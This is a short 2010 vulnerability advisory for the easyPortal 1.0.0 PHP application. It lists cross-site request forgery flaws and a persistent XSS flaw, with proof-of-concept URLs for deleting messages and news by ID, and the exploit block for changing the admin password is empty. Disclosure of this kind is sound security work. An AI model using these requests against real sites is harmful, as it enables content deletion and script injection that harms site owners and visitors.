[#-----------------------------------------------------------------------------------------------#] [#] Author: Milos Zivanovic [#] Email: milosz.security[at]gmail.com [#] Date: 02. January 2010. [#-----------------------------------------------------------------------------------------------#] [#] Application: easyPortal [#] Version: 1.0.0 [#] Platform: PHP [#] Homepage: http://www.eazyportal.com/ [#] Vulnerability: Multiple XSRF Vulnerabilities And Persistent XSS [#-----------------------------------------------------------------------------------------------#] [#]Content |--Change admin password |--Add news - Persistent XSS |--Remove private message by id |--Remove news by id [*]Change admin password [EXPLOIT------------------------------------------------------------------------------------------]
[EXPLOIT------------------------------------------------------------------------------------------] [+]Add news - Persistent XSS http://host/index.php?a=administrator&p=news&s=add There we can add new news that can be seen on main page. It is vulnerable to persistent xss and attacker can use this to infect website visitors. [-]Remove private message by id [POC----------------------------------------------------------------------------------------------] http://host/index.php?a=private&inbox=&d=[ID] [POC----------------------------------------------------------------------------------------------] [-]Remove news by id [POC----------------------------------------------------------------------------------------------] http://host/index.php?a=administrator&p=news&del=[ID] [POC----------------------------------------------------------------------------------------------] [#] EOF